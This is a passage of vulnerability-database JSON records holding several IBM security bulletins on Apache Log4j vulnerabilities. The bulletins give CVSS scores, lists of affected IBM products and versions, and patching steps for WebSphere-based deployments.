Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:17:23", "type": "ibm", "title": "Security Bulletin: 
Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:17:23", "id": "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "href": "https://www.ibm.com/support/pages/node/6526462", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:39:26", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the Apache Log4j vulnerability has been published in a security bulletin. Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. 
Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customer with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading. 
**\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ).\n\nYou only need to apply the interim fix provided by the WAS team. Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n**Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. 
Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh\u00a0server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). \n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the latest log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because of this workaround, even after you apply the fix, the grep command shows log4j-api-2.13.3.jar version in the output. However, be assured that Log4j is upgraded to log4j-api-2.15.0.jar.\n\n 5. 
Copy the renamed Log4j JAR files to the following location: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. \n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n**Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). 
You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](<http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:20", "description": "## Summary\n\nThere are multiple Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105) impacting IBM StoredIQ for Legal. Apache Log4j is included in WebSphere Application Server (WAS), which is distributed with IBM Stored IQ for Legal. 
These vulnerabilities are addressed by removing Apache Log4j from WAS.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nStoredIQ for Legal| 2.0.3 \n \n\n\n## Remediation/Fixes\n\nFor the affected version specified above, apply [PH42762](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/StoredIQ+for+Legal&release=2.0.3.14&platform=All&function=all> \"\" ) interim fix on top of WAS 8.5.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n08 Jun 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZL2P\",\"label\":\"StoredIQ for Legal\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"2.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T07:56:30", "type": "ibm", "title": "Security Bulletin: IBM StoredIQ for Legal is vulnerable to denial of service and remote code execution due to Apache log4j ( CVE-2021-44228, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", 
"CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-06-09T07:56:30", "id": "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "href": "https://www.ibm.com/support/pages/node/6593781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:48", "description": "## Summary\n\nCrypto Hardware Initialization and Maintenance (CHIM 3.0.0) as shipped with CCA 7.2.55 for MTM 4769 is affected by several vulnerabilities in Apache Log4j (CVE-2021-45105 and CVE-2021-45046). CHIM is using Apache Log4j for internal logging purposes of regular user activity. The fix includes Apache Log4j 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nCrypto Hardware Initialization and Maintenance| CHIM 3.0.0 for CCA 7.2.55 for MTM 4769 (setup4769_7.2.55.bin) \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading:**\n\n**Product(s)**| **Fixed Version(s)** \n---|--- \nCrypto Hardware Initialization and Maintenance (CHIM)| CHIM 3.0.1 for CCA 7.2.55 for MTM 4769 (setup4769_chim_log4j_patch_7.2.55.bin) \n \nThe fixed version can be obtained from the [CCA Software Download Page](<https://www.ibm.com/security/cryptocards/pciecc4/software> \"CCA Software Download Page\" ).\n\n## Workarounds and Mitigations\n\nFor local administrative purposes the Crypto Node Management (CNM) tool can be used instead of Crypto Hardware Initialization and Maintenance (CHIM) for most administrative tasks.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web 
Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[Security Bulletin: Vulnerability in Apache Log4J addressed in Crypto Hardware Initialization and Maintenance (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6538138> \"Security Bulletin: Vulnerability in Apache Log4J addressed in Crypto Hardware Initialization and Maintenance \\(CVE-2021-44228\\)\" ) \n[CCA Software Download Page](<https://www.ibm.com/security/cryptocards/pciecc4/software> \"CCA Software Download Page\" )\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW19X\",\"label\":\"Other xSeries\"},\"Component\":\"MTM 4769 - Crypto Hardware Installation and Maintenance Tool\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"MTM 4769 - CHIM 3.0.0.x\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 6.0}, "published": "2022-01-14T21:57:12", "type": "ibm", "title": "Security Bulletin: Crypto Hardware Initialization and Maintenance is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T21:57:12", "id": "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "href": "https://www.ibm.com/support/pages/node/6541056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:35:30", "description": "## Summary\n\nEnterprise Content Management System Monitor is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046). Apache Log4j is used by Enterprise Content Management System Monitor as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nEnterprise Content Management System Monitor| 5.5 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading. 
\n\nUse the following Fix Central URLs to download the fix:\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.0&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.0&platform=All&function=all>)\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.1&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.1&platform=All&function=all>)\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.7.0&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.7.0&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](<http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Jan 2022: Initial 
Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSEM9N\",\"label\":\"Enterprise Content Management System Monitor\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"5.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T07:18:10", "type": "ibm", "title": "Security Bulletin: Enterprise Content Management System Monitor is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
